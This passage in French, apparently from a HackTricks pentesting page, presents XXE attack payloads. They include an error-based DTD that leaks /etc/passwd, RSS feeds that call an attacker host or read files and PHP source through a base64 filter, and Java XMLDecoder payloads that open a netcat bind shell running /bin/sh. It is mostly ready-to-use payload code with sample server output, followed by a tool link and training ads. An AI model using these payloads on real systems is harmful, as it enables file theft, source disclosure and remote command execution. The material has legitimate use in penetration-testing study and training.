<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
%foo;
%xxe;

Le serveur répond avec une erreur, reflétant de maniÚre importante le fichier inexistant, indiquant que le serveur tente d'accéder au fichier spécifié :

javascript
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}

Pour inclure le contenu du fichier dans le message d'erreur, le fichier DTD est ajusté :

xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>">
%foo;
%xxe;

Cette modification conduit à l'exfiltration réussie du contenu du fichier, comme cela est reflété dans la sortie d'erreur envoyée via HTTP. Cela indique une attaque XXE (XML External Entity) réussie, utilisant à la fois des techniques Out of Band et Error-Based pour extraire des informations sensibles.

RSS - XEE

XML valide au format RSS pour exploiter une vulnérabilité XXE.

Ping back

RequĂȘte HTTP simple vers le serveur des attaquants.

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>XXE Test Blog</title>
<link>http://example.com/</link>
<description>XXE Test Blog</description>
<lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>Test Post</description>
<author>author@example.com</author>
<pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>

Lire le fichier

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>

Lire le code source

Utiliser le filtre base64 de PHP

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>

Java XMLDecoder XEE to RCE

XMLDecoder est une classe Java qui crée des objets à partir d'un message XML. Si un utilisateur malveillant parvient à amener une application à utiliser des données arbitraires dans un appel à la méthode readObject, il obtiendra instantanément une exécution de code sur le serveur.

Using Runtime().exec()

xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="6">
<void index="0">
<string>/usr/bin/nc</string>
</void>
<void index="1">
<string>-l</string>
</void>
<void index="2">
<string>-p</string>
</void>
<void index="3">
<string>9999</string>
</void>
<void index="4">
<string>-e</string>
</void>
<void index="5">
<string>/bin/sh</string>
</void>
</array>
</void>
</object>
</java>

ProcessBuilder

xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="6">
<void index="0">
<string>/usr/bin/nc</string>
</void>
<void index="1">
<string>-l</string>
</void>
<void index="2">
<string>-p</string>
</void>
<void index="3">
<string>9999</string>
</void>
<void index="4">
<string>-e</string>
</void>
<void index="5">
<string>/bin/sh</string>
</void>
</array>
<void method="start" id="process">
</void>
</void>
</java>

Outils

GitHub - luisfontes19/xxexploiter: Tool to help exploit XXE vulnerabilities

Références

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks